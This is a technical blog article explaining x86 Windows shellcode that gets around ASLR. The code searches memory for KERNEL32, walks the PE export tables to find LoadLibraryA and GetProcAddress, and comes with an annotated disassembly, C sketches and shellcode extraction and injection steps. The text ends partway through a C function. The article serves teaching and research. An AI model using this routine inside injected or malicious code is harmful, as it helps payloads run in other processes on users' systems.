BYTE* / Shellcode Part 2: Locating KERNEL32 in ASLR memory

Date: Feb 14, 2018

Last-Modified: Sep 18, 2018

Download Source Code: findkernel_src.zip (21k)

NOTE: See the Limitations section from Part 1 for information about how this technique is impacted by SafeSEH.

SUMMARY:
In Part 1 of this series (Swallowing Exceptions in Win32), I illustrated an efficient x86 shellcode implementation of KERNEL32's IsBadReadPtr() function. It swallows the Access Violation exceptions raised when probing arbitrary memory locations in the context of a user-mode process. In this article (Part 2), we'll build on this functionality to search memory and discover the location of any API in the system, loading dependent library modules as needed. This is especially useful in modern versions of Windows, where the locations of system API functions are intentionally randomized in memory for security purposes.

This article also provides insight into how code can be constructed to gain access to system resources from within a process, no matter how that process's executable module was built, potentially reducing any process to a code-launching container. While obviously useful to malware, these techniques can also prove useful for applying non-invasive patches to software for which no source code is available.

MEMORY SEARCH: A UNIVERSAL METHOD OF API DISCOVERY:
Let's say we want shellcode to search memory so that it can discover where the MessageBoxA() function resides, allowing us to pop up a message box. Countless examples target the MessageBox API because it's one of the simplest ways to indicate a successful proof-of-concept, so I'm going to use it as well.

We also want the method to be portable across all x86 (32- or 64-bit) versions of Windows. It should also work in any process, whether or not that process already imports functions from the desired library module. In our case, the desired library is USER32.DLL, because it is the executable module that contains MessageBoxA().

The memory-search method is not the only way for shellcode to reliably locate API functions across different versions of Windows. In my opinion, however, it has the highest educational value because it exposes you to several important concepts: exception suppression, Windows memory layout, and parsing PE files. The only trade-off is code complexity. Luckily, the performance cost of locating each desired function is negligible. It is on par with (if not much less than) the initial delay when a process first starts and the Windows loader parses and resolves the process's imports section.

THE KERNEL32.DLL GATEWAY:
Fortunately, we can do everything we need if we can just locate two KERNEL32.DLL functions: LoadLibrary() and GetProcAddress(). From there, we can exclusively rely on the operating system to efficiently load and locate the addresses of any other functions needed. And, because ALL processes always have KERNEL32.DLL loaded into their address space, it is always possible to access these two functions to bootstrap any number of APIs you want to access at runtime.

In summary, we are interested in KERNEL32.DLL because it:

is guaranteed to exist in all processes
contains the LoadLibrary() and GetProcAddress() APIs, which unlock access to all other API functions

At this point, you may have noticed a chicken-and-egg problem. Since we don't yet know the locations of LoadLibrary() and GetProcAddress(), how do we get their addresses without first calling LoadLibrary() and GetProcAddress()? We'll need to use one of a handful of known tricks to discover them.

ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR)
Why can't addresses to API functions be hardcoded? Because system API addresses are no longer predictable on modern (post-XP) versions of Windows.

Before Microsoft released Vista, Windows loaded system DLLs at fixed addresses in all processes. Each version and service pack level of the operating system loaded KERNEL32.DLL at the same base address. As a result, shellcode could hardcode the addresses of the two "holy-grail" functions (LoadLibrary() and GetProcAddress()) for common versions of Windows and gain easy access to the remaining APIs on the machine. For example, Windows XP Service Pack 3 always loaded KERNEL32 at 0x7C800000, LoadLibrary() at 0x7C801D7B and GetProcAddress() at 0x7C80AE30 system-wide. Apart from having to carry a table of addresses for each function and each version of Windows, shellcode had a convenient path into the system once it gained control.

With the public release of Windows Vista in January 2007, Microsoft stepped up its game with a security feature known as ASLR (Address Space Layout Randomization). ASLR randomizes the base load address of all system DLLs, including KERNEL32.DLL, each time the operating system boots. Additionally, 3rd-party modules can "opt in" to the feature by specifying the IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE flag in the OptionalHeader's DllCharacteristics. This ended the days of hardcoding addresses for system DLLs, and malware now had to jump through a few more hoops to bypass ASLR.

In April 2007, Microsoft's Mark Russinovich wrote the following in the TechNet article "Inside the Windows Vista Kernel":

...
This hasn't posed a problem for malware on previous versions of Windows because for any given Windows release, system executable images and DLLs always load at the same location, allowing malware to assume that APIs reside at fixed addresses. The Windows Vista Address Space Load Randomization (ASLR) feature makes it impossible for malware to know where APIs are located by loading system DLLs and executables at a different location every time the system boots. Early in the boot process, the Memory Manager picks a random DLL image-load bias from one of 256 64KB-aligned addresses in the 16MB region at the top of the user-mode address space. As DLLs that have the new dynamic-relocation flag in their image header load into a process, the Memory Manager packs them into memory starting at the image-load bias address and working its way down. Executables that have the flag set get a similar treatment, loading at a random 64KB-aligned point within 16MB of the base load address stored in their image header. Further, if a given DLL or executable loads again after being unloaded by all the processes using it, the Memory Manager reselects a random location at which to load it. Figure 7 shows an example address-space layout for a 32-bit Windows Vista system, including the areas from which ASLR picks the image-load bias and executable load address.

Figure 7 - ASLR's effect on executable and DLL load addresses

Only images that have the dynamic-relocation flag, which includes all Windows Vista DLLs and executables, get relocated because moving legacy images could break internal assumptions that developers have made about where their images load. Visual Studio® 2005 SP1 adds support for setting the flag so that third-party developers can take full advantage of ASLR. Randomizing DLL load addresses to one of 256 locations doesn't make it impossible for malware to guess the correct location of an API, but it severely hampers the speed at which a network worm can propagate and it prevents malware that only gets one chance at infecting system from working reliably. In addition, ASLR's relocation strategy has the secondary benefit that address spaces are more tightly packed than on previous versions of Windows, creating larger regions of free memory for contiguous memory allocations, reducing the number of page tables the Memory Manager allocates to keep track of address-space layout, and minimizing Translation Lookaside Buffer (TLB) misses.

A security whitepaper from Symantec also reported additional details about the Windows Vista implementation of ASLR:

While loading an image that has elected to participate in ASLR, the system uses a random global image offset. This offset is selected once per reboot, although we've uncovered at least one other way to cause this offset to be reset without a reboot (see Appendix II). The image offset is selected from a range of 256 values and is 64 KB aligned. The offset and the other random parameters are generated pseudo-randomly. All images loaded together into a process - including the main executable and DLLs - are loaded one after another at this offset. Because image offsets are constant across all processes, a DLL that is shared between processes can be loaded at the same address in all processes for efficiency.

When executing a program whose image has been marked for ASLR, the memory layout of the process is further randomized by placing the thread stack and the process heaps randomly. The stack address is selected first. The stack region is selected from a range of 32 possible locations, each separated by 64 KB or 256 KB (depending on the STACK_SIZE setting).

Once the stack has been placed, the initial stack pointer is further randomized by a random decremental amount. The initial offset is selected to be up to half a page (2,048 bytes), but is limited to naturally aligned addresses (4-byte alignment on IA32 and 16-byte alignment on IA64). The choices result in an initial stack pointer chosen from one of 16,384 possible values on an IA32 system. Once the stack address has been selected, the process heaps are selected. Each heap is allocated from a range of 32 different locations, each separated by 64 KB. The location of the first heap must be chosen to avoid the previously placed stack, and each of the heaps following must be allocated to avoid those that come before.

The address of an operating system structure known as the Process Environment Block (PEB) is also selected randomly. The PEB randomization feature was introduced earlier in Windows XP SP2 and Windows 2003 SP1, and is also present in Windows Vista. Although implemented separately, it is also a form of address space randomization; but unlike the other ASLR features, PEB randomization occurs whether or not the executable being loaded elected to use the ASLR feature. An important result of the ASLR design in Windows Vista is that some address space layout parameters, such as PEB, stack, and heap locations, are selected once per program execution. Other parameters, such as the location of the program code, data segment, BSS segment, and libraries, change only between reboots.

In general, bypassing ASLR requires searching memory for KERNEL32.DLL or using hint(s) as to its current whereabouts.

A MEMORY SEARCH ALGORITHM:
We'll use the same basic algorithm whether we search memory for EXEs or DLLs, because both use the same (PE) format. First, pick a start address and test whether it is accessible, that is, whether that memory is mapped into the current process. If it isn't, swallow the resulting Access Violation exception and loop back to try the next memory location. Otherwise, check whether that memory location begins with the 16-bit DOS-header signature "MZ" (little-endian value 0x5A4D). If this byte sequence is found, we can confirm we have a valid PE image by locating the PE header. From there, we can locate the export directory (if any) and walk its tables to find the desired function(s).
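To make the validation steps concrete, here is a minimal C sketch of the same header checks. It assumes a 32-bit (PE32) image already mapped at `base`. The function name `pe32_export_rva` and the `size` bound are hypothetical. The bound stands in for the isBadReadPtr() probe the shellcode uses, because portable C has no safe way to touch unmapped memory. The offsets are the same ones used in the disassembly later in this article: 0x3C for e_lfanew, PE+0x18 for the OptionalHeader magic, and PE+0x78 for the export directory RVA.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* PE fields are little-endian; read them byte by byte so the code is portable. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Hypothetical helper: returns 1 and stores the export directory RVA (0 if the
   image has no exports) when `base` looks like a PE32 image, otherwise returns 0.
   `size` bounds every read, standing in for the shellcode's isBadReadPtr() probe. */
static int pe32_export_rva(const uint8_t *base, size_t size, uint32_t *export_rva) {
    assert(base != NULL && export_rva != NULL);
    if (size < 0x40 || rd16(base) != 0x5A4D)            /* "MZ" DOS signature */
        return 0;
    uint32_t e_lfanew = rd32(base + 0x3C);              /* offset of the PE header */
    if (e_lfanew == 0 || e_lfanew > size || size - e_lfanew < 0x7C)
        return 0;
    const uint8_t *pe = base + e_lfanew;
    if (rd32(pe) != 0x00004550)                         /* "PE\0\0" signature */
        return 0;
    if (rd16(pe + 0x18) != 0x010B)                      /* IMAGE_NT_OPTIONAL_HDR32_MAGIC */
        return 0;
    *export_rva = rd32(pe + 0x78);                      /* DataDirectory[EXPORT].VirtualAddress */
    return 1;
}
```

If you pass it a candidate 64 KB boundary that holds a PE32 image, it returns 1 along with the export RVA. Anything else, such as a page that doesn't start with "MZ", returns 0.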

The only catch is that testing every user-mode memory location in the normal 2 GB range would take too long, and a noticeable delay isn't ideal. Luckily, the operating system imposes some restrictions on how executable modules are aligned in memory:

All executable modules are aligned on a 64 KB (65536 byte) boundary; i.e. a multiple of 0x10000
System modules, such as KERNEL32.DLL, are randomly offset within the upper 16 MB region of user-mode memory
System modules tend to be placed as high as possible in user-mode memory

Because executable modules are always 64 KB aligned, we can drastically reduce the number of memory locations to test. As a side note, the 64 KB alignment requirement applies to any executable module loaded anywhere in memory on all versions of Windows. It follows from the system's 64K allocation granularity, a long-standing design decision. Additionally, Windows tends to choose high preferred base addresses for system DLLs, and all ASLR does is push those DLLs downward by a random offset of up to 16 MB. In the worst case, that means only 256 comparisons to find the DLL, and searching backwards from the top greatly improves the odds of finding it early.
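The worst-case figure is simply the size of the ASLR window divided by the module alignment:

```latex
\frac{16\ \text{MB}}{64\ \text{KB}} = \frac{2^{24}\ \text{bytes}}{2^{16}\ \text{bytes}} = 2^{8} = 256 \text{ candidate base addresses}
```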

Now that we know we want to search backwards through memory in 64 KB decrements, where should we start? Since kernel-mode addressing begins at 0x80000000, you might expect the search to start at the first 64 KB boundary below it, 0x7FFF0000. However, that 64 KB block is the upper user-mode "off-limits" region, so there is no point in testing it. Like the lower user-mode "off-limits" region between 0x00000000 and 0x0000FFFF, it exists to catch bad pointers. Therefore, we start our search another 64 KB lower, at 0x7FFE0000.
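Combining the alignment rule with the starting point gives the sequence of addresses the search visits. The C sketch below shows that sequence. It assumes a 32-bit process with the default 2 GB user-mode address space. `candidate_bases()` and the two macros are hypothetical names. This sketch only records each address, whereas the shellcode probes each one with isBadReadPtr() and checks it for an "MZ" signature.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define MODULE_ALIGNMENT 0x10000u     /* 64 KB: module bases are multiples of this */
#define SEARCH_START     0x7FFE0000u  /* one 64 KB step below the 0x7FFF0000 off-limits region */

/* Hypothetical helper: writes up to `max` candidate module base addresses into `out`,
   walking downward from `start` in 64 KB steps and stopping after address 0
   (the same walk as SUB EBX, 10000 / TEST EBX, EBX in the listing).
   Returns the number of candidates written. */
static size_t candidate_bases(uint32_t start, uint32_t *out, size_t max) {
    assert(start % MODULE_ALIGNMENT == 0);
    size_t n = 0;
    uint32_t addr = start;
    while (n < max) {
        out[n++] = addr;
        if (addr == 0)
            break;                      /* nothing lower left to test */
        addr -= MODULE_ALIGNMENT;
    }
    return n;
}
```

Requesting 256 candidates from SEARCH_START produces 0x7FFE0000, 0x7FFD0000, and so on down to 0x7EFF0000, which covers a 16 MB window below the start address.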

An annotated disassembly of the shellcode search function is illustrated below, with added spacing and indentation for clarity:

004010DE  55                PUSH EBP                             ;searchMemory()
004010DF  8BEC              MOV EBP, ESP                         ;standard stack frame setup
004010E1  83C4 E8           ADD ESP, -18                         ;reserve 18h bytes for local variables
004010E4  9C                PUSHFD                               ;preserve previous processor state
004010E5  60                PUSHAD
004010E6  FC                CLD                                  ;ensure default direction is forward
004010E7  E8 00000000       CALL $+5 <004010EC>                  ;CALL-POP technique; get address of next instruction; inline data is then just an offset
004010EC  58                POP EAX                              ;eax = current EIP (as of the beginning of this POP instruction)
004010ED  83C0 06           ADD EAX, 6                           ;adjust eax so it points past these instructions and to string data (below)
004010F0  EB 1C             JMP SHORT searchCodeBegin <0040110E> ;jump past string data

004010F2  4C 6F 61 64 4C 69 62 72 61 72 79 41 00        ASCII "LoadLibraryA",0
004010FF  47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00  ASCII "GetProcAddress",0

0040110E  8945 F8           MOV DWORD PTR SS:[EBP-8], EAX        ;searchCodeBegin: init - [ebp-8] = address of "LoadLibraryA" string
00401111  83C0 0D           ADD EAX, 0D                          ;skip 0Dh bytes ("LoadLibraryA",0)
00401114  8945 F4           MOV DWORD PTR SS:[EBP-0C], EAX       ;[ebp-0C] = address of "GetProcAddress" string
00401117  C745 FC 00000000  MOV DWORD PTR SS:[EBP-4], 0
0040111E  BB 0000FE7F       MOV EBX, 7FFE0000                    ;ebx=mem_location, off-limits-start-region minus 64KB (0x7FFF0000-0x10000)
00401123  33C9              XOR ECX, ECX                         ;module-found count initialized to zero

00401125  60                PUSHAD                               ;loopMemTest: save the state of register variables prior to possible exceptions
00401126  53                PUSH EBX                             ;address we are testing
00401127  E8 82FFFFFF       CALL isBadReadPtr <004010AE>
0040112C  8945 F0           MOV DWORD PTR SS:[EBP-10], EAX       ;temporarily store result here (we don't need this variable at this point)
0040112F  61                POPAD                                ;restore our register variables
00401130  8B45 F0           MOV EAX, DWORD PTR SS:[EBP-10]       ;eax = isBadReadPtr() result
00401133  85C0              TEST EAX, EAX                        ;if memory not readable, try next memory location
00401135  0F85 C5000000     JNZ searchNextMemory <00401200>
0040113B  8B33              MOV ESI, DWORD PTR DS:[EBX]          ;memory IS readable; see if module has an MZ signature
0040113D  66:81FE 4D5A      CMP SI, 5A4D                         ;is it "MZ"?
00401142  0F85 B8000000     JNE searchNextMemory <00401200>
00401148  8B73 3C           MOV ESI, DWORD PTR DS:[EBX+3C]       ;MZ sig FOUND - locate PE sig - esi = DOS header "e_lfanew"
0040114B  85F6              TEST ESI, ESI
0040114D  0F84 AD000000     JZ searchNextMemory <00401200>       ;if (!e_lfanew) skip to next module
00401153  03F3              ADD ESI, EBX                         ;esi = PE header
00401155  8B06              MOV EAX, DWORD PTR DS:[ESI]
00401157  3D 50450000       CMP EAX, 4550                        ;"PE",0,0 signature?
0040115C  0F85 9E000000     JNE searchNextMemory <00401200>      ;if (pe_hdr != "PE",0,0) skip to next module
00401162  66:8B46 18        MOV AX, WORD PTR DS:[ESI+18]         ;check esi+18h for PE32 (i.e. 32-bit OptionalHeader magic / IMAGE_NT_OPTIONAL_HDR32_MAGIC)
00401166  66:3D 0B01        CMP AX, 10B                          ;IMAGE_NT_OPTIONAL_HDR32_MAGIC
0040116A  0F85 90000000     JNE searchNextMemory <00401200>      ;unsupported OptionalHeader signature, skip this module
00401170  8B7E 78           MOV EDI, DWORD PTR DS:[ESI+78]       ;edi = optHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress
00401173  C745 E8 00000000  MOV DWORD PTR SS:[EBP-18], 0         ;init LoadLibrary and GetProcAddress address locations
0040117A  C745 EC 00000000  MOV DWORD PTR SS:[EBP-14], 0
00401181  85FF              TEST EDI, EDI                        ;locate exports table and functions/names array
00401183  74 7B             JZ SHORT searchNextMemory <00401200> ;if (!optHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress) goto next module
00401185  03FB              ADD EDI, EBX                         ;add base to turn RVA into pointer
00401187  897D F0           MOV DWORD PTR SS:[EBP-10], EDI       ;save off pointer to export table (pExportTable)
0040118A  8B4F 18           MOV ECX, DWORD PTR DS:[EDI+18]       ;ecx = NumberOfNames, i.e. the number of names left to test
0040118D  8B57 20           MOV EDX, DWORD PTR DS:[EDI+20]       ;edx = AddressOfNames RVA
00401190  03D3              ADD EDX, EBX                         ;edx = AddressOfNames array + base = pCurNameRVA

00401192  51                PUSH ECX                             ;parseModuleNextName: save NumberOfNamesLeft
00401193  8B32              MOV ESI, DWORD PTR DS:[EDX]          ;esi = *pCurNameRVA
00401195  83FE 00           CMP ESI, 0
00401198  74 4F             JE SHORT parseModuleNextName_cleanup <004011E9> ;if (!*pCurNameRVA) goto cleanup
0040119A  03F3              ADD ESI, EBX                         ;esi = pszCurName = *pCurNameRVA + base
0040119C  837D E8 00        CMP DWORD PTR SS:[EBP-18], 0         ;if we already found LoadLibrary's address,
004011A0  75 11             JNE SHORT parseGpa <004011B3>        ; skip to look for GetProcAddress instead
004011A2  B9 0D000000       MOV ECX, 0D                          ;look for LoadLibraryA export string; length of "LoadLibraryA",0
004011A7  8B7D F8           MOV EDI, DWORD PTR SS:[EBP-8]        ;edi = "LoadLibraryA" string
004011AA  F3:A6             REPE CMPS BYTE PTR DS:[ESI], BYTE PTR ES:[EDI] ;compare names, including the terminating NUL
004011AC  75 05             JNE SHORT parseGpa <004011B3>        ;not found, test function name for GPA
004011AE  8D75 E8           LEA ESI, [EBP-18]                    ;FOUND! translate name location to func address and store at [esi]
004011B1  EB 13             JMP SHORT foundFunction <004011C6>
004011B3  B9 0F000000       MOV ECX, 0F                          ;parseGpa: look for GetProcAddress export string; length of "GetProcAddress",0
004011B8  8B7D F4           MOV EDI, DWORD PTR SS:[EBP-0C]       ;edi = "GetProcAddress" string
004011BB  8B32              MOV ESI, DWORD PTR DS:[EDX]          ;esi = pointer to current function name (REPE CMPS advanced it)
004011BD  03F3              ADD ESI, EBX
004011BF  F3:A6             REPE CMPS BYTE PTR DS:[ESI], BYTE PTR ES:[EDI]
004011C1  75 26             JNE SHORT parseModuleNextName_cleanup <004011E9> ;not found, this function doesn't match either
004011C3  8D75 EC           LEA ESI, [EBP-14]                    ;FOUND! translate name location to func address and store at [esi]
004011C6  52                PUSH EDX                             ;foundFunction: locate and store address of function:
004011C7  56                PUSH ESI                             ; *savedFunc = arFuncs[arOrdinals[curNamesIdx]]
004011C8  8B7D F0           MOV EDI, DWORD PTR SS:[EBP-10]       ;edi = pExportTable
004011CB  8B77 1C           MOV ESI, DWORD PTR DS:[EDI+1C]
004011CE  03F3              ADD ESI, EBX                         ;esi = pExportTable->AddressOfFunctions array + base
004011D0  8B57 24           MOV EDX, DWORD PTR DS:[EDI+24]
004011D3  03D3              ADD EDX, EBX                         ;edx = pExportTable->AddressOfNameOrdinals array + base
004011D5  8B4F 18           MOV ECX, DWORD PTR DS:[EDI+18]       ;ecx = pExportTable->NumberOfNames
004011D8  2B4C24 08         SUB ECX, DWORD PTR SS:[ESP+8]        ;ecx = NumberOfNames - NumberOfNamesLeft (saved ecx on stack) == zero-based curNamesIdx, a.k.a. hint
004011DC  0FB70C4A          MOVZX ECX, WORD PTR DS:[ECX*2+EDX]   ;ecx (curOrd) = arOrdinals[curNamesIdx]
004011E0  8B0C8E            MOV ECX, DWORD PTR DS:[ECX*4+ESI]    ;ecx = func_addr RVA = arFuncs[curOrd]
004011E3  03CB              ADD ECX, EBX                         ;ecx = func_addr
004011E5  5E                POP ESI                              ;esi = savedFunc
004011E6  890E              MOV DWORD PTR DS:[ESI], ECX          ;*savedFunc = func_addr
004011E8  5A                POP EDX
004011E9  59                POP ECX                              ;parseModuleNextName_cleanup: ecx = names left to test
004011EA  837D E8 00        CMP DWORD PTR SS:[EBP-18], 0         ;do we have addresses for both functions yet?
004011EE  74 08             JE SHORT findkernel.004011F8         ;no: advance to the next name
004011F0  837D EC 00        CMP DWORD PTR SS:[EBP-14], 0
004011F4  74 02             JE SHORT findkernel.004011F8
004011F6  EB 17             JMP SHORT appDone <0040120F>         ;yes: skip to function end
004011F8  83C2 04           ADD EDX, 4                           ;edx = pCurNameRVA++
004011FB  49                DEC ECX                              ;ecx = NumberOfNamesLeft
004011FC  85C9              TEST ECX, ECX                        ;do we have names left?
004011FE  75 92             JNZ SHORT parseModuleNextName <00401192> ;dec+test+jnz used in place of LOOP

00401200  85DB              TEST EBX, EBX                        ;searchNextMemory: if we just tested memory location 0, there is nothing more to test
00401202  74 0B             JZ SHORT appDone <0040120F>
00401204  81EB 00000100     SUB EBX, 10000                       ;try the next lower 64 KB boundary, as Windows always loads modules on a 64 KB boundary
0040120A  E9 16FFFFFF       JMP loopMemTest <00401125>

0040120F  61                POPAD                                ;appDone: cleanup - restore previous processor state
00401210  9D                POPFD
00401211  8B45 EC           MOV EAX, DWORD PTR SS:[EBP-14]       ;return addresses through registers: eax = GetProcAddress
00401214  8B55 E8           MOV EDX, DWORD PTR SS:[EBP-18]       ;edx = LoadLibraryA
00401217  C9                LEAVE                                ;tear down stack frame
00401218  C2 0400           RETN 4                               ;clean up one argument; this implementation passes stdout handle in DEBUG mode
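The name-to-address translation between parseModuleNextName and foundFunction can also be written in C, which some readers may find easier to follow than the listing. This is a simplified, hedged rendition, not the author's source. `find_export_rva` is a hypothetical name, and it uses strcmp() where the shellcode uses REPE CMPS over the name plus its terminating NUL. Like the shellcode, it trusts the export directory and performs no bounds checks. The loop index `hint` corresponds to the value computed at 004011D8.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Hypothetical helper: look up `name` in the export directory located at RVA
   `exp_rva` of an image mapped at `base`. Returns the function's RVA, or 0 if the
   name isn't exported. Like the shellcode, it trusts the headers (no bounds checks). */
static uint32_t find_export_rva(const uint8_t *base, uint32_t exp_rva, const char *name) {
    assert(base != NULL && name != NULL);
    const uint8_t *edir  = base + exp_rva;
    uint32_t num_names   = rd32(edir + 0x18);         /* NumberOfNames */
    const uint8_t *funcs = base + rd32(edir + 0x1C);  /* AddressOfFunctions */
    const uint8_t *names = base + rd32(edir + 0x20);  /* AddressOfNames */
    const uint8_t *ords  = base + rd32(edir + 0x24);  /* AddressOfNameOrdinals */

    for (uint32_t hint = 0; hint < num_names; hint++) {
        uint32_t name_rva = rd32(names + 4u * hint);  /* *pCurNameRVA */
        if (name_rva == 0)
            continue;                                 /* same skip as the listing */
        if (strcmp((const char *)(base + name_rva), name) == 0) {
            uint16_t ord = rd16(ords + 2u * hint);    /* arOrdinals[curNamesIdx] */
            return rd32(funcs + 4u * ord);            /* arFuncs[curOrd] */
        }
    }
    return 0;
}
```

The lookup returns an RVA. Adding the module base (EBX in the listing) produces the callable address, which is what ADD ECX, EBX does at 004011E3.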

SOURCE CODE SUMMARY:
The MASM source code can be downloaded from the link at the top of the article. The package comes with some batch scripts that build an EXE and manipulate the shellcode embedded within it. The source code embeds ASCII markers in the resulting executable so that tools can extract the shellcode easily. This allows the shellcode to be run either as an EXE or as an injectable binary.
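The article's scripts rely on external tools for extraction. To illustrate the marker idea, here is a portable C sketch that finds a payload bracketed by two marker strings in a file image held in memory. The marker strings in the usage example are placeholders, not the actual markers emitted by the findkernel source. `find_bytes()` and `extract_between()` are hypothetical helpers.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define NOT_FOUND ((size_t)-1)

/* Offset of the first occurrence of `needle` in `hay` at or after `from`, or
   NOT_FOUND. A portable stand-in for the non-standard memmem(). */
static size_t find_bytes(const unsigned char *hay, size_t hay_len, size_t from,
                         const char *needle, size_t needle_len) {
    if (needle_len == 0 || hay_len < needle_len)
        return NOT_FOUND;
    for (size_t i = from; i <= hay_len - needle_len; i++)
        if (memcmp(hay + i, needle, needle_len) == 0)
            return i;
    return NOT_FOUND;
}

/* Hypothetical helper: locate the payload bracketed by two marker strings.
   On success stores its offset and size and returns 1; returns 0 otherwise. */
static int extract_between(const unsigned char *buf, size_t len,
                           const char *start_marker, const char *end_marker,
                           size_t *offset, size_t *size) {
    assert(buf && start_marker && end_marker && offset && size);
    size_t s_len = strlen(start_marker), e_len = strlen(end_marker);
    size_t s = find_bytes(buf, len, 0, start_marker, s_len);
    if (s == NOT_FOUND)
        return 0;
    size_t begin = s + s_len;            /* payload starts right after the start marker */
    size_t e = find_bytes(buf, len, begin, end_marker, e_len);
    if (e == NOT_FOUND)
        return 0;
    *offset = begin;
    *size = e - begin;
    return 1;
}
```

For example, searching the buffer `"junk<<BEGIN>>\x90\x90\xC3<<END>>tail"` for the placeholder markers `"<<BEGIN>>"` and `"<<END>>"` yields offset 13 and size 3. With a real EXE, the offset and size would play the same role as the "Offset" and "Dump Size" values the extraction script reports.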

Once the EXE is built, you can use the shellcode scripts to extract and launch the shellcode. You will need to download the bd and shelljmp tools separately, because these optional scripts depend on them. The tools may be placed in the same directory as the source or somewhere in your path. This lets you launch the shellcode in an "unaware" generic host process to finalize this proof-of-concept code. With minor modifications, you can obviously use whatever shellcode extraction and hosting tools are in your toolbox, although I'll illustrate using these tools as designed below.

To build the source, edit the variables at the top of build.bat to point to the directory that contains your Visual C++ toolset, that is, where your MASM (ML.EXE) and linker tools are located. You don't need Visual Studio installed, but you do need a version of those tools along with any dependency DLLs. The exact files are documented in build.bat. The code has been tested and builds without errors or warnings on the Visual C++ toolsets 7.1 (2003) through 10.0 (2010), and it should also build with later versions. The resulting EXEs may differ slightly because of differing linker versions, but the shellcode produced by the different versions of MASM is identical.

The source code contains the isBadReadPtr() function we built in Part 1 of this series, as well as the boilerplate code that calls the shellcode function from the EXE. To keep things simple, I put everything in a single source file with no includes necessary. Near the top are the usual declarations and some debugging macros, which you can enable by setting the DEBUG variable to "1" in the included build.bat. This produces a DEBUG version of the EXE that outputs search progress to the console.

If you use the DEBUG version of the EXE, note that it is only designed to be run as an EXE from the console. Any shellcode extracted from the DEBUG version won't run properly (i.e. it will crash), because various debugging strings reference the .data section. I didn't bother building these strings into the shellcode, which keeps it compact and simple for this article.

You'll notice the build script uses editbin.exe (also part of the Visual C++ toolset) as a post-link step to enable ASLR for the resulting binary (the /dynamicbase option). This adds the 0x40 (IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) flag to the OptionalHeader.DllCharacteristics member of the PE header. This step requires editbin from Visual C++ 8.0 (2005) SP1 or later. I included it so you can experiment with it by commenting or uncommenting that line of the script. The flag only randomizes the base load address of the EXE itself and doesn't affect the location of KERNEL32.DLL, so it is present only for completeness and reference.
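Conceptually, the header change that editbin /dynamicbase makes is a single bit flip. The sketch below uses a hypothetical `set_dynamic_base()` helper that operates on a PE32 file image loaded into a buffer. It sets just that bit in OptionalHeader.DllCharacteristics, which sits at OptionalHeader + 0x46, i.e. PE header + 0x5E. This is only an illustration and is not how editbin is implemented. It does not update the header checksum or any other field a real tool might touch.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE 0x0040u

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Hypothetical helper: sets DYNAMIC_BASE in OptionalHeader.DllCharacteristics of a
   PE32 file image held in `img`. Returns 1 on success, 0 if the headers don't check out. */
static int set_dynamic_base(uint8_t *img, size_t size) {
    assert(img != NULL);
    if (size < 0x40 || rd16(img) != 0x5A4D)                   /* "MZ" */
        return 0;
    uint32_t e_lfanew = rd32(img + 0x3C);
    if (e_lfanew == 0 || e_lfanew > size || size - e_lfanew < 0x60)
        return 0;
    uint8_t *pe = img + e_lfanew;
    if (rd32(pe) != 0x00004550 || rd16(pe + 0x18) != 0x010B)  /* "PE\0\0", PE32 magic */
        return 0;
    /* DllCharacteristics lives at OptionalHeader + 0x46, i.e. PE header + 0x5E. */
    uint16_t flags = (uint16_t)(rd16(pe + 0x5E) | IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE);
    pe[0x5E] = (uint8_t)(flags & 0xFF);
    pe[0x5F] = (uint8_t)(flags >> 8);
    return 1;
}
```

Any bits already set in DllCharacteristics are preserved. Only 0x40 is ORed in.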

Keep in mind that if a module doesn't contain a .reloc section, the operating system has no choice but to ignore the IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE flag, because it can't load the module anywhere BUT its preferred load address. This is why modules that support ASLR must be linked with /FIXED:NO, which is the implied default for DLLs but not for EXEs. This option forces the linker to generate a .reloc section.
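By the same reasoning, you can tell whether ASLR is able to relocate an image by checking two things: the DYNAMIC_BASE bit is set, and relocation data survived linking. The hypothetical `can_be_rebased()` helper below checks IMAGE_FILE_RELOCS_STRIPPED in FileHeader.Characteristics and the size of the base relocation data directory (index 5), which the .reloc section populates. It is a sketch under those assumptions, not the loader's exact logic.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define IMAGE_FILE_RELOCS_STRIPPED            0x0001u
#define IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE 0x0040u
#define IMAGE_DIRECTORY_ENTRY_BASERELOC       5

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Hypothetical helper: returns 1 if a PE32 image both opts in to ASLR and carries
   relocation data the loader could use to rebase it, 0 otherwise. */
static int can_be_rebased(const uint8_t *img, size_t size) {
    assert(img != NULL);
    if (size < 0x40 || rd16(img) != 0x5A4D)                   /* "MZ" */
        return 0;
    uint32_t e_lfanew = rd32(img + 0x3C);
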